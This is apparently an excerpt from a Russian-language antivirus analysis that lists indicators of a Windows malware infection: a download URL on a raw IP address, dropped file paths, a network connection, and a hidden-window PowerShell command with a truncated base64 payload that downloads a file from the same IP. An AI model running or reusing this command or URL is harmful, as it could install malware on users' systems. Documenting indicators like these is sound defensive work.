Техническая информация
- http://80.82.64.45/~yakar/msvmonr.exe как %appdata%\msvmonr.exe
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1896
- %TEMP%\1181348.cvr
- '80.#2.64.45':80
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' powershell -window hidden -enc KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA4ADAALgA4ADIALg...' (со скрытым окном)